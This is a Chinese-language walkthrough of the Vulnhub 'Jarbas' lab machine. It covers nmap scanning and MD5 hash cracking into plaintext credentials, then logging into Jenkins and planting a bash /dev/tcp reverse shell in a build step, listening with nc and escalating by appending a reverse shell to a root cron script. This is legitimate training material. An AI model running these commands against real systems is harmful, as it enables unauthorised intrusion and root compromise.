【Vulnhub靶机】Jarbas--Jenkins

文章目录

文档说明:https://www.vulnhub.com/entry/jarbas-1,232/

靶机下载:Download (Mirror):

信息收集

主机发现

扫描C段

复制代码
sudo nmap -sn 10.9.75.0/24

端口扫描

复制代码
sudo nmap --min-rate 10000 10.9.75.10

详细扫描服务版本,系统

bath 复制代码
sudo nmap -sT -sV -O -p 22,80,3306,8080 10.9.75.10 

目录爆破

bash 复制代码
dirsearch -u http://10.9.75.10 -i 200  

漏洞探测

whatweb

访问80端口

bash 复制代码
whatweb http://10.9.75.10

并没有识别到类似的CMS内容管理系统,

继续访问access.html发现了类似用户名:加密后的密码的东西

hash-identifier

可以使用工具来验证加密类型

bash 复制代码
hash-identifier "5978a63b4654c73c60fa24f836386d87"  

拿去在线网站进行md5解密

tiago:italia99

trindade:marianna

eder:vipsu

访问8080端口

whatweb

bash 复制代码
whatweb http://10.9.75.10:8080

指纹识别出一个Jenkins的CMS管理系统

尝试使用上面解密出来的密码进行登陆

使用eder:vipsu登陆成功!

新建一个任务

选择第一个自由风格软件项目就可以,然后往下翻,点击确定

点击Build构建

由于目标系统是linux系统,所以选择第二个execute shell

bash 复制代码
/bin/bash >& /dev/tcp/10.9.75.3/6868 0>&1

#反弹到kali上

点击应用,然后点击保存

这个时候kali先监听6868端口

bash 复制代码
nc  -lvvp 6868  

回到页面上点击立即构建

就反弹到kali机器上了

页面上会显示有一个任务正在运行

我们拿到shell是没有回显的,可以通过python获取显示shell

python 复制代码
python -c "import pty;pty.spawn('/bin/bash')"

最后再计划任务里找到了以root运行 的程序

查看文件内容

bash 复制代码
cat /etc/script/CleaningScript.sh

可以在里面添加反弹shell,

bash 复制代码
echo "/bin/bash >& /dev/tcp/10.9.75.3/6869 0>&1" >> /etc/script/CleaningScript.sh

kali监听6869端口,等待反弹

Jenkins 的漏洞利用方式有很多,可以自行去网上查阅相关资料

相关推荐
i_am_a_div_日积月累_1 天前
jenkins打包报错
运维·rust·jenkins·jenkins打包报错
一个处女座的暖男程序猿1 天前
2G2核服务器安装ES
服务器·elasticsearch·jenkins
一个处女座的暖男程序猿1 天前
2G2核服务器安装ES 7X版本
服务器·elasticsearch·jenkins
GeminiJM1 天前
优化Elasticsearch批量写入性能:从单分片瓶颈到多索引架构
elasticsearch·架构·jenkins
matrixlzp2 天前
Jenkins 实战2:pipeline 编写一个自动化部署
运维·jenkins
城南花开时2 天前
CCID工具,Jenkins、GitLab CICD、Arbess一文全方位对比分析
jenkins·gitlab cicd
江湖人称小鱼哥2 天前
Jenkins 在构建 Java 项目并操作 Docker 时 CPU 会突然飙高
java·docker·jenkins
snow@li2 天前
运维:部署Jenkins
运维·jenkins
zjshuster2 天前
elastic search 学习
学习·elasticsearch·jenkins
安冬的码畜日常3 天前
【JUnit实战3_22】 第十三章:用 JUnit 5 做持续集成(下):Jenkins + JUnit 5 + Git 持续集成本地实战演练完整复盘
git·测试工具·ci/cd·jenkins·集成测试·持续集成·junit5